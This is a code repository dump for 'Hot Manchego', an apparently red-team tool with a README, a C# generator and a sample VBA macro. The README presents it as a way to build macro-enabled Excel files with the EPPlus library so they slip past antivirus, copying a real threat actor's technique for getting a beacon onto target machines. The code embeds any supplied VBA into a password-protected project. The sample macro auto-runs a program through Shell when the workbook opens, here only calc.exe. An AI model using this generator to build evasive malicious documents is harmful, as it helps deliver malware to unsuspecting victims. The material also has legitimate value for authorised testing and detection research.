├── EPPlus.dll ├── README.md ├── hot-manchego.cs └── vba.txt /EPPlus.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedSiege/hot-manchego/3bd4bf88c111bbe2bde840f8af8e46e61d3c5d72/EPPlus.dll -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hot Manchego 2 | 3 | Macro-Enabled Excel File Generator (.xlsm) using the EPPlus Library. 4 | 5 | ## Usage 6 | 7 | ``` 8 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs 9 | hot-manchego.exe blank.xlsm vba.txt 10 | ``` 11 | 12 | Compile the C# program file along with the EPPlus DLL. Then call the hot-manchego exe file with two arguments: the first is a blank xlsm file and the second is a txt file with your macro in vba format. 13 | 14 | ## Introduction 15 | 16 | In September 1, 2020, [NVISO published a blog post about Operation Epic Manchego](https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/#comments). A threat actor had been uploading Macro-Enabled Excel Files (xlsm) to VirusTotal with farily ordinary VBA macros. However, the method they used to create the files helped them get past most A/V vendors. Instead of creating the malicious Excel files using Microsoft Office, like everyone does, they used a third-party library called EPPlus. When using EPPlus, the creation of the Excel document varied significantly enough that most A/V didn't catch a simple lolbas payload to get a beacon on a target machine. 17 | 18 | For more details about the Epic Manchego campaign and a detailed walkthrough of detection methods, please view [NVISO's post](https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/#comments). 19 | 20 | ## About This Tool 21 | 22 | Hot Manchego uses the EPPlus Library to create a Macro-Enabled Excel File. There are three files (plus the README) in this repository. 23 | 24 | 1. EPPlus.dll 25 | > This is the brains of the operation. The EPPlus library enables us to create the macro files.If you'd like to compile your own version of the EPPlus DLL provided in this repo, [the original source code repository is available here](https://github.com/JanKallman/EPPlus). We didn't make any modifications to the EPPlus Library for use in this tool. 26 | 27 | 2. vba.txt 28 | > This is just a sample vba file that pops calculator. 29 | 30 | 3. hot-manchego.cs 31 | > The file was based off of Sample15.cs from the EPPlus project. This file drives the creation of the Macro-enabled Excel File. Once compiled, the exe takes two inputs: a blank xlsm file and a txt file with your vba. 32 | 33 | ## Detection 34 | 35 | NVISO wrote some detection rules for these files. Please see their post. -------------------------------------------------------------------------------- /hot-manchego.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.IO; 6 | using OfficeOpenXml; 7 | using System.Security.Cryptography.X509Certificates; 8 | using System.Drawing; 9 | using OfficeOpenXml.Style; 10 | using OfficeOpenXml.Drawing.Chart; 11 | 12 | namespace HotManchego 13 | { 14 | class VBAGenerator 15 | { 16 | public static void Main(string[] args) 17 | { 18 | if(args.Length == 0) { 19 | System.Console.WriteLine("Usage: hot-manchego.exe blank.xlsm vba.txt\nThe first argument is a blank XLSM file.\nThe second argument is the VBA you want embedded in the XLSM file."); 20 | System.Environment.Exit(1); 21 | } 22 | if(args.Length == 1){ 23 | System.Console.WriteLine("Usage: hot-manchego.exe blank.xlsm vba.txt\nThe first argument is a blank XLSM file.\nThe second argument is the VBA you want embedded in the XLSM file."); 24 | System.Environment.Exit(1); 25 | } 26 | 27 | var outFile = new FileInfo(Directory.GetCurrentDirectory() + "\\" + args[0]); 28 | var vbaFile = new FileInfo(Directory.GetCurrentDirectory() + "\\" + args[1]); 29 | FillVBA(outFile, vbaFile); 30 | 31 | } 32 | private static void FillVBA(FileInfo outFile, FileInfo vbaFile) 33 | { 34 | ExcelPackage pck = new ExcelPackage(); 35 | 36 | //Add a worksheet. 37 | var ws = pck.Workbook.Worksheets.Add("Sheet1"); 38 | //ws.Drawings.AddShape("VBASampleRect", eShapeStyle.RoundRect); 39 | 40 | //Create a vba project and set password permissions 41 | pck.Workbook.CreateVBAProject(); 42 | pck.Workbook.VbaProject.Protection.SetPassword("EPPlus"); 43 | 44 | //Read in vba code from file 45 | pck.Workbook.CodeModule.Code = File.ReadAllText(vbaFile.FullName); 46 | 47 | //Optionally, Sign the code with your company certificate. 48 | //X509Store store = new X509Store(StoreName.My, StoreLocation.CurrentUser); 49 | //store.Open(OpenFlags.ReadOnly); 50 | //pck.Workbook.VbaProject.Signature.Certificate = store.Certificates[0]; 51 | 52 | //Save as xlsm 53 | pck.SaveAs(outFile); 54 | } 55 | } 56 | } 57 | 58 | -------------------------------------------------------------------------------- /vba.txt: -------------------------------------------------------------------------------- 1 | Private Sub Workbook_Open() 2 | Dim Program As String 3 | Dim TaskID As Double 4 | On Error Resume Next 5 | Program = "calc.exe" 6 | TaskID = Shell(Program, 1) 7 | If Err <> 0 Then 8 | MsgBox "Can't start " & Program 9 | End If 10 | End Sub 11 | --------------------------------------------------------------------------------